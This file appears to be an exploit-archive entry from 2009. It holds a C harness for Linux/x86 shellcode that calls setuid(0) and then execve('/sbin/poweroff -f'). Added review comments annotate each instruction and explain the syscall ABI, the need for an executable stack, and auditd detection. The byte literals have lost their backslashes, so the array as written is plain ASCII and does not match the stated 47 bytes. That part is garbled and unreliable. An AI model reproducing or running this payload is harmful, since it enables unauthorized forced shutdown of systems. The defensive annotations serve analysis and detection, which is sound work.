# Title : Linux - setuid(0) & execve("/sbin/poweroff -f")
# Published : 2009-12-04
# Author : ka0x
#include <stdio.h>
/*
linux/x86 ; setuid(0) & execve("/sbin/poweroff -f") 47 bytes
written by ka0x - <ka0x01[alt+64]gmail.com>
lun sep 21 16:40:16 CEST 2009
greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek, Hendrix and others!
*/
/*
 * Test harness for the payload described in the header comment
 * (linux/x86, 32-bit int 0x80 system-call ABI, 47 bytes).
 *
 * What the payload does, per the disassembly comments below:
 *   1. setuid(0)  - syscall 0x17 (23) with ebx = 0. The return value is
 *      never checked; eax is overwritten by the next instruction. From an
 *      unprivileged process the call fails and the rest runs with the
 *      caller's existing credentials.
 *   2. execve("/sbin/poweroff", {"/sbin/poweroff", "-f", NULL}, NULL)
 *      - syscall 0xb (11). Path and argument strings are built on the stack.
 *
 * NOTE(review): every literal below lacks its backslashes ("x31xdb", not
 * "\x31\xdb"), and the printf format ends in "nn". This looks like escape
 * sequences lost when the page was extracted. As written, the array holds
 * plain ASCII text, not the instruction bytes named in the comments, and
 * sizeof(shellcode)-1 is 141 rather than the 47 stated in the header.
 *
 * Defensive view: the array is an automatic (stack) object, so calling into
 * it depends on the stack being executable. On systems that enforce a
 * non-executable stack the call faults instead of running. The observable
 * behaviour of the intended payload is a setuid(0) followed by an execve of
 * /sbin/poweroff with "-f"; process-execution auditing (for example an
 * auditd execve rule) that records unexpected parents of /sbin/poweroff
 * would surface it.
 */
int main()
{
char shellcode[] =
"x31xdb" // xor ebx,ebx              ebx = 0, the uid argument
"x6ax17" // push byte 0x17           0x17 = 23 = setuid on i386
"x58" // pop eax                     eax = 23
"xcdx80" // int 80h                  setuid(0); result not checked
"x8dx43x0b" // lea eax,[ebx+0xb]     eax = 11 = execve on i386 (ebx is still 0)
"x99" // cdq                         edx = 0; later used as terminator, NULL and envp
"x52" // push edx                    zero bytes terminating the path string
"x66x68x66x66" // push word 0x6666           "ff"
"x68x77x65x72x6f" // push dword 0x6f726577   "wero"
"x68x6ex2fx70x6f" // push dword 0x6f702f6e   "n/po"
"x68x2fx73x62x69" // push dword 0x6962732f   "/sbi" -> stack holds "/sbin/poweroff"
"x89xe3" // mov ebx,esp              ebx = pointer to the path
"x52" // push edx                    zero bytes terminating the argument string
"x66x68x2dx66" // push word 0x662d   "-f"
"x89xe1" // mov ecx,esp              ecx = pointer to "-f"
"x52" // push edx                    argv[2] = NULL
"x51" // push ecx                    argv[1] = "-f"
"x53" // push ebx                    argv[0] = path
"x89xe1" // mov ecx,esp              ecx = argv
"xcdx80" ; // int 80h                execve(path, argv, NULL)
// Reports the payload length, excluding the literal's terminating NUL.
// NOTE(review): sizeof yields size_t, so %d is a format/argument mismatch
// (undefined behaviour); %zu is the matching specifier.
printf("[*] ShellCode size (bytes): %dnn", sizeof(shellcode)-1 );
// Casts the array's address to a function pointer and calls it. ISO C does
// not define object-to-function pointer conversion; the call only works
// where data pointers are callable and the stack page is executable.
(*(void(*)()) shellcode)();
// Reached only if the call above returns; a successful execve does not return.
return 0;
}